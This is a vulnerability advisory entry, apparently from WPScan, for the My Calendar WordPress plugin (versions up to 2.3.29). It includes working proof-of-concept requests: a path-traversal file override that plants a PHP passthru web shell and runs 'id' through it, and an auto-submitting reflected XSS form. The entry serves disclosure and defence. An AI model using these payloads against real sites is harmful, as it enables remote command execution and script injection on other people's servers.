My Calendar <= 2.3.29 - Arbitrary File Override & Reflected XSS

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The file override vulnerability allows an admin to override any file on the web server, ignoring settings such as DISALLOW_FILE_EDIT.
Proof of Concept
Arbitrary File Override
-----------------------

POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles
   Post Data:
      _wpnonce[a_valid_nonce]
      mc_edit_style[true]

mc_css_file[../../../../../../../var/www/wordpress/wp-content/plugins/some-plugin/some-writable-file.php]
      mc_show_css[]
      style[<?php passthru($_GET['exec']) ?>]
      save[Save+Changes]

GET
http://localhost/wordpress/wp-content/plugins/some-plugin/some-writable-file.php?exec=id

Reflected XSS
-------------

<form name="myform"
action="http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-help"
method="POST">
<input name="generator" id="generator" value="1">
<input name="foo" id="foo" value="</textarea><script>alert(1)</script>">
<input type="submit" value="Submit">
</form>
<script>document.myform.submit();</script>

Affects

Plugin my-calendar
fixed in version 2.3.30

References

URL http://software-talk.org/blog/2015/05/arbitrary-file-override-reflected-xss-my-calendar-wordpress-plugin/

Classification

Type MULTI

Miscellaneous

Submitter Tim Coen
Submitter Website http://software-talk.org/blog
Views 144
Verified No
WPVDB ID 7990

Timeline

Publicly Published 2015-05-15 (over 1 year ago)
Added 2015-05-15 (over 1 year ago)
Last Updated 2015-05-15 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.